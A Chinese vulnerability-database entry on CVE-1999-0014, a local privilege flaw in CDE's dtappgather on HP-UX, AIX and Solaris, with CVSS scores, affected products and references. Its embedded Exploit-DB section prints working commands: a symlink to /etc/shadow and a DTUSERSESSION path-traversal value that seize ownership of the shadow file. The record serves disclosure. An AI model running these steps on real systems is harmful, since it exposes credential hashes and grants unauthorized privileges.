CVE-1999-0014
CVSS7.2
发布时间 :1998-01-21 00:00:00
修订时间 :2008-09-09 08:33:32
NMCOE    

[原文]Unauthorized privileged access or denial of service via dtappgather program in CDE.


[CNNVD]CDE dtappgather程序非法访问及服务拒绝漏洞(CNNVD-199801-017)

        CDE中的dtappgather程序存在漏洞。导致非法的有特权的访问或者服务拒绝。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:cde:cde:1.2
cpe:/a:cde:cde:1.02_x86
cpe:/a:cde:cde:1.2_x86
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/a:cde:cde:1.01_x86
cpe:/a:cde:cde:1.01
cpe:/o:ibm:aix:4.3IBM AIX 4.3
cpe:/o:ibm:aix:4.1IBM AIX 4.1
cpe:/a:cde:cde:1.02
cpe:/o:ibm:aix:4.2IBM AIX 4.2
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:vvos:10.24HP VVOS 10.24

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0014
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0014
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199801-017
(官方数据源) CNNVD

- 其它链接及资源

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9801-075
(UNKNOWN)  HP  HPSBUX9801-075
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/185
(UNKNOWN)  SUN  00185

- 漏洞信息

CDE dtappgather程序非法访问及服务拒绝漏洞
高危 未知
1998-01-21 00:00:00 2005-05-02 00:00:00
本地  
        CDE中的dtappgather程序存在漏洞。导致非法的有特权的访问或者服务拒绝。

- 公告与补丁

        

- 漏洞信息 (19108)

HP HP-UX 10.20/11.0,IBM AIX <= 4.3,SCO Unixware 7.0,Sun Solaris <= 2.6 (EDBID:19108)
unix local
1999-11-03 Verified
0 Mastoras
N/A [点击下载]
source: http://www.securityfocus.com/bid/131/info

Due to improper checking of ownership, the dtappgather utility shipped with the Common Desktop Environment allows arbitrary users to overwrite any file present on the filesystem, regardless of the owner of the file. 

dtappgather uses a directory of permissions 0777 to create temporary files used by each login session. /var/dt/appconfig/appmanager/generic-display-0 is not checked for existence prior to the opening of the file by dtappgather, and as such, if a user were to create a symbolic link from this file to another on the filesystem, the permissions of this file would be changed to 0666.

An additional bug exists whereby dtappgather blindly uses the contents of the DTUSERSESSION environment variable. By setting this variable to point to a file on the filesystem, its permissions can also be changed. As this command takes place relative to the /var/dt/appconfig directory, a series of '..' are required to establish the root directory, after which any file can be altered.

% ls -l /etc/shadow
-r--r--r-- 1 root other 1500 Dec 29 18:21 /etc/shadow
% ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0
% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
% ls -l /etc/shadow
-r-xr-xr-x 1 user users 1500 Dec 29 18:21 /etc/shadow
---------------------------------------------
$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow		

- 漏洞信息

11648
CDE dtappgather Symlink Privilege Escalation
Local Access Required Race Condition

- 漏洞描述

Unknown or Incomplete

- 时间线

1998-01-21 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站